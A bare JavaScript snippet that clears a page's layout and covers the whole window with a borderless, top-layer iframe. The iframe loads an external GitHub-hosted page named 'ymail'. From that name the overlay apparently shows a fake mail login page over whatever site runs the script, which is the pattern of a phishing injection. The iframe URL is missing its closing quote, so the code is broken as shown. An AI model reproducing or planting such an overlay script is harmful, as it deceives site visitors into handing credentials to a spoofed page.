var fs1 = document.getElementById('fs1');
if(fs1) {
	fs1.parentNode.removeChild(fs1);
}
var body = document.body;
html=document.getElementsByTagName('html')[0];
html.style.width='100%';
html.style.height='100%';
html.style.position='absolute';
html.style.margin='auto';
html.style.borderStyle="none";
html.style.borderWidth="0px";
html.style.overflowY="hidden";
html.style.overflowX="hidden";
html.frameborder="0";
html.scrolling="no";
body.style.width='100%';
body.style.height='100%';
body.style.position='absolute';
body.style.margin='auto';
body.style.borderStyle="none";
body.style.borderWidth="0px";
body.style.overflowY="hidden";
body.style.overflowX="hidden";
body.frameborder="0";
body.scrolling="no";
var iframe = document.createElement('iframe');
iframe.style.width="100%";
iframe.style.height="100%";
iframe.style.borderStyle="none";
iframe.style.borderWidth="0px";
iframe.style.position="absolute";
iframe.style.top="0";
iframe.style.left="0";
iframe.style.zIndex=99999;
iframe.style.overflowY="hidden";
iframe.style.overflowY="hidden";
iframe.frameborder="0";
iframe.border="0";
iframe.scrolling="no";
iframe.src='https://github.com/monikaa/ymail/blob/master/index.html;
body.appendChild(iframe);